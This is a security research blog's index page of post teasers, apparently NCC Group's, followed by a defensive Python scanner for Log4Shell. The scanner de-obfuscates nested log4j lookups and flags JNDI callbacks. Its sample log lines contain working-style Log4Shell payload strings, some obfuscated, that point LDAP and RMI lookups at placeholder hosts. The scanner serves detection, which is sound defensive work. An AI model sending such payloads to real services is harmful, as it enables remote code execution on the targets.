NCC Group Research Home

  • 10 real-world stories of how we’ve compromised CI/CD pipelines

    January 13, 2022 by Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, and Jennifer Fernick

    Mainstream appreciation for cyberattacks targeting continuous integration and continuous delivery/continuous deployment (CI/CD) pipelines has been gaining momentum. Attackers and defenders increasingly understand that build pipelines are highly privileged targets with a substantial attack surface. But what are the potential weak points in a CI/CD…

  • Impersonating Gamers With GPT-2

    January 12, 2022

    In this blog post, I’m going to recount the story of my quest to train OpenAI’s large language model, GPT-2, to create a virtual doppelganger of myself and my peers. Machine learning is one of those buzzwords that, sometimes, lives up to its reputation. As an information security professional, my go-to hobby has typically been…

  • NCC Group’s 2021 Annual Research Report

    January 10, 2022

    Following the popularity of our first Annual Research Report in 2020, we present to you now, for the second year, a summary of our public-facing security research findings, drawn from the over 237 conference publications, technical blog posts, advisories, and tool releases published by researchers at NCC Group between January 1 2021 and December 31…

  • Tool Release – insject: A Linux Namespace Injector

    January 8, 2022

    tl;dr: Grab the release binary from our repo and have fun. Also, happy new year; 2021 couldn’t end soon enough. Background: A while back, I was asked by one of my coworkers on the PSC team about ways in which to make their custom credit card data scanner cloud native to assess Kubernetes clusters. While…

  • On the malicious use of large language models like GPT-3

    December 31, 2021

    (Or, “Can large language models generate exploits?”) While attacking machine learning systems is a hot topic for which attacks have begun to be demonstrated, I believe that there are a number of entirely novel, yet-unexplored attack-types and security risks that are specific to large language models (LMs), that may be intrinsically dependent upon things like…

  • Tool Update – ruby-trace: A Low-Level Tracer for Ruby

    December 31, 2021

    We released ruby-trace back in August to coincide with my DEF CON 29 talk on it and parasitic tracing in general. Back then, it supported (c)Ruby 2.6 through 3.0. A few days ago, Ruby 3.1 was released. We have updated ruby-trace to add support for Ruby 3.1 and reorganized our test suite to validate our…

  • Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches

    December 29, 2021

    Background: Java Virtual Machines (JVMs) provide a number of mechanisms to inspect and modify Java applications and the runtime they stand on. These include Java agents, JARs that are capable of modifying Java class files at runtime; and JVMTI agents, native libraries that can perform deep hooking into the innards of the JVM itself.…

  • Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)

    December 15, 2021

    Summary: The ImController service comes installed on certain Lenovo devices; for example, NCC found the service installed on a ThinkPad workstation. The service runs as the SYSTEM user and periodically executes child processes which perform system configuration and maintenance tasks. Impact: Elevation of privilege. An attacker can elevate their privileges to that of the SYSTEM…

  • Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers

    December 15, 2021

    The Microcontroller Unit (MCU) is the heart of an embedded device, where the main firmware executes its instructions to carry out the system’s functions. These come in many varieties. Relatively simple microcontrollers with limited-resource processors may bundle only a few IO peripherals, a small amount of memory, and be intended to run a small real-time…

  • FPGAs: Security Through Obscurity?

    December 14, 2021

    Background: For the uninitiated, an FPGA is a field-programmable array of logic that is typically used to perform or accelerate some specific function (or functions) within a computer system. They are typically paired with a separate traditional microprocessor (or as part of a combined system-on-chip (SoC)) but can operate standalone as well. They can be…

  • Public Report – WhatsApp opaque-ke Cryptographic Implementation Review

    December 13, 2021

    In June 2021, WhatsApp engaged NCC Group to conduct a security assessment of the ‘opaque-ke’ library, an open source Rust implementation of the OPAQUE password authenticated key exchange protocol. The protocol is designed to allow password-based authentication in such a way that a server does not actually learn the plaintext value of the client’s password,…

  • log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

    December 12, 2021

    tl;dr: Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems. In this post, we first offer some context on the vulnerability, the…

  • Log4Shell: Reconnaissance and post exploitation network detection

    Note: This blog post will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 15th at 17:30 UTC. tl;dr: In the wake of the CVE-2021-44228, CVE-2021-45046 and CVE-2021-44832 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in…
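    The two Log4Shell entries above describe, respectively, a Java agent that blocks log4j’s remote class loading and network-side detection of exploitation. A host-side complement that neither teaser spells out is spotting the JNDI lookup string itself in logged input. The example below is added here for illustration; it is not code from either NCC Group post, and it is not how the log4j-jndi-be-gone agent works (that runs inside the JVM). It reduces the common lookup-nesting tricks attackers used to evade naive `${jndi:` matching (`${lower:…}`, `${upper:…}` and the `${x:y:-default}` default-value form) before matching, and reports the scheme and callback host. The log lines are constructed samples; the IPs are from documentation ranges. Other evasions exist (for example `${date:…}` literals), so treat a negative result as "not seen by this rule", not "clean".

    ```python
    import re

    # Constructed sample access-log lines (not taken from the original posts).
    SAMPLE_LOGS = [
        '10.0.0.5 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://198.51.100.7:1389/a}"',
        '10.0.0.6 - - "GET / HTTP/1.1" 200 "User-Agent: ${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
        '10.0.0.7 - - "GET / HTTP/1.1" 200 "User-Agent: ${${env:NOPE:-j}ndi:rmi://203.0.113.9:1099/o}"',
        '10.0.0.8 - - "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0"',
    ]

    # Innermost ${...} lookup: body contains no further '$', '{' or '}'.
    INNER = re.compile(r"\$\{([^${}]*)\}")

    # After normalisation, match ${jndi:<scheme>://<host>...} case-insensitively.
    JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/:}\s]+)", re.I)


    def _reduce(body):
        """Return what log4j's lookup would evaluate this innermost body to, or
        None if it is the jndi lookup itself (or an unknown lookup we must keep).
        Only the lookups commonly used for evasion are modelled here."""
        low = body.lower()
        if low.startswith("jndi:"):
            return None
        if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> "j"
            return body.split(":-", 1)[1]
        if low.startswith("lower:"):          # ${lower:J} -> "j"
            return body[6:].lower()
        if low.startswith("upper:"):          # ${upper:j} -> "J"
            return body[6:].upper()
        return None


    def normalize(text, max_rounds=20):
        """Repeatedly collapse innermost nested lookups until nothing reducible
        remains. max_rounds bounds the work on hostile, deeply nested input."""
        for _ in range(max_rounds):
            changed = False

            def sub(m):
                nonlocal changed
                replacement = _reduce(m.group(1))
                if replacement is None:
                    return m.group(0)
                changed = True
                return replacement

            text = INNER.sub(sub, text)
            if not changed:
                break
        return text


    def detect_jndi(line):
        """Return (scheme, host) for the first JNDI lookup found after
        de-obfuscation, or None if the line carries no such lookup."""
        m = JNDI.search(normalize(line))
        if not m:
            return None
        return m.group(1).lower(), m.group(2)


    def scan(lines):
        """Return [(line_index, scheme, host), ...] for every suspicious line."""
        hits = []
        for i, line in enumerate(lines):
            found = detect_jndi(line)
            if found:
                hits.append((i, found[0], found[1]))
        return hits


    if __name__ == "__main__":
        for idx, scheme, host in scan(SAMPLE_LOGS):
            print(f"line {idx}: jndi lookup via {scheme} to {host}")
    ```

    The callback hosts this yields are the same indicators the network-side detection would see as outbound LDAP/RMI connections from the application server, so the two views can be correlated: a host-side hit with no matching egress suggests the lookup was blocked (by an agent such as the one above, or by a patched log4j), while an egress with no logged input points at a field this scanner did not cover.
    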
